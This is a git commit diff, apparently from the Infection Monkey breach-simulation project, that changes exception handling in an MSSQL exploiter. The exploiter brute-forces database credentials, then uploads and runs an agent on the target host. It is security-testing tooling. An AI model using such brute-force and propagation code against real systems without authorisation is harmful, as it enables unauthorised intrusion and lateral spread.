Agent: Improve exception handling in mssqlexec.py

2022-03-15 08:51:22 +02:00 · 2022-03-15 08:51:22 +02:00 · 1f327a1305
parent 66ee3527d2
commit 1f327a1305
2 changed files with 17 additions and 19 deletions
--- a/monkey/common/utils/exceptions.py
+++ b/monkey/common/utils/exceptions.py
@ -1,7 +1,3 @@
-class ExploitingVulnerableMachineError(Exception):
-    """ Raise when exploiter failed, but machine is vulnerable """
-
-
 class FailedExploitationError(Exception):
    """ Raise when exploiter fails instead of returning False """

--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -1,12 +1,11 @@
 import logging
 import os
-import sys
 from time import sleep

 import pymssql

 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
-from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
+from common.utils.exceptions import FailedExploitationError
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_agent_dest_path
@ -65,26 +64,29 @@ class MSSQLExploiter(HostExploiter):
            self.options["credentials"]["exploit_user_list"],
            self.options["credentials"]["exploit_password_list"],
        )
-        self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
+        try:
+            self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
+        except FailedExploitationError:
+            logger.info(
+                f"Failed brute-forcing of MSSQL server on {self.host},"
+                f" no credentials were successful"
+            )
+            return self.exploit_result

        # Create dir for payload
        self.create_temp_dir()
+        self.create_empty_payload_file()

-        try:
-            self.create_empty_payload_file()
+        http_thread = self.start_monkey_server()
+        self.upload_monkey()
+        MSSQLExploiter._stop_monkey_server(http_thread)

-            http_thread = self.start_monkey_server()
-            self.upload_monkey()
-            MSSQLExploiter._stop_monkey_server(http_thread)
+        # Clear payload to pass in another command
+        self.create_empty_payload_file()

-            # Clear payload to pass in another command
-            self.create_empty_payload_file()
+        self.run_monkey()

-            self.run_monkey()
-
-            self.remove_temp_dir()
-        except Exception as e:
-            raise ExploitingVulnerableMachineError(e.args).with_traceback(sys.exc_info()[2])
+        self.remove_temp_dir()

        self.exploit_result.propagation_success = True
        return self.exploit_result